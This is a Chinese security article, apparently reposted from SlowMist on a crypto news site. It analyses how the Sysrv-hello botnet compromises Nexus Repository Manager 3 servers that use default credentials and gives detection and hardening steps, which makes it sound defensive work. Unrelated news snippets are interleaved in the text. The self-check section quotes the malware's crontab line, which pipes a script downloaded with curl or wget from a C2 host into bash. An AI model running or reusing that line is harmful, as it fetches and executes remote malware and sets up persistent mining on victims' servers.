FLUX:慢雾：技术拆解 Sysrv-hello 僵尸网络入侵原理_EFI

攻击路径

Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击，Maven私服部署会用到NexusRepositoryManager3，由于Maven是个流行服务，所以也给了Sysrv-hello僵尸网络的大范围感染机会。

当NexusRepositoryManager3服务对外网开放且存在默认账号密码时，Sysrv-hello就可以直接扫描入侵，利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。

慢雾：7月3日至7月7日期间?Web3生态因安全问题损失近1.3亿美元:7月10日消息，慢雾发推称，自7月3日至7月7日，Web3生态因安全问题遭遇攻击损失128,419,000美元，包括Encryption AI、AzukiDao、NFT Trader、MIKE&SID、Bryan Pellegrino、Aptos Foundation、Multichain、CivFund。其中，Multichain被攻击损失1.26亿美元。[2023/7/10 10:12:36]

入侵到服务器后会自动下载执行ldr.sh文件，该文件主要功能：1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿，文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴

慢雾：BXH于BSC链被盗的ETH、BTC类资产已全部跨链转至相应链:11月3日消息，10月30日攻击BXH的黑客（BSC: 0x48c94305bddfd80c6f4076963866d968cac27d79）在洗币过程中，多次使用了 AnySwap、PancakeSwap、Ellipsis 等兑换平台，其中部分 ETH 代币被兑换成 BTC。此外，黑客现已将 13304.6 ETH、642.88 BTCB 代币从 BSC 链转移到 ETH、BTC 链，目前，初始黑客获利地址仍有 15546 BNB 和价值超 3376 万美元的代币。慢雾 AML 将持续监控被盗资金的转移，拉黑攻击者控制的所有钱包地址，提醒交易所、钱包注意加强地址监控，避免相关恶意资金流入平台。[2021/11/3 6:28:49]

第二个木马sysrv的主要功能：1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播，随机扫描其他IP服务，同样进行NexusRepositoryManager3漏洞利用，同时也会尝试入侵MySQL、Tomcat、WebLogic等服务

声音 | 慢雾：使用中心化数字货币交易所及钱包的用户注意撞库攻击:据慢雾消息，近日，注意到撞库攻击导致用户数字货币被盗的情况，具体原因在于用户重复使用了已泄露的密码或密码通过撞库攻击的“密码生成基本算法”可以被轻易猜测，同时用户在这些中心化服务里并未开启双因素认证。分析认为，被盗用户之所以没开启双因素认证是以为设置了独立的资金密码就很安全，但实际上依赖密码的认证体系本身就不是个足够靠谱的安全体系，且各大中心化数字货币交易所及钱包在用户账号风控体系的策略不一定都一致，这种不一致可能导致用户由于“惯性思维”而出现安全问题。[2019/3/10]

自查方法

进程：network01sysrv

文件：/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab：echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口：52013

存在以上这些，停止备份样本后删除。

加固建议

删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问，严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后，重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力，存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明：作为区块链信息平台，本站所发布文章仅代表作者个人观点，与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考，并非作为或被视为实际投资建议。

本文来源于非小号媒体平台：

慢雾科技

现已在非小号资讯平台发布68篇作品，

非小号开放平台欢迎币圈作者入驻

入驻指南：

/apply_guide/

本文网址：

/news/9606255.html

免责声明：

1.资讯内容不构成投资建议，投资者应独立决策并自行承担风险

2.本文版权归属原作所有，仅代表作者本人观点，不代表非小号的观点或立场

上一篇：

深入解析MakeDao在新周期里的机遇和风险

标签：LENDEFILUXFLUXSolendDeFinityThe Luxury Coinconflux币手机怎么挖

AAVE热门资讯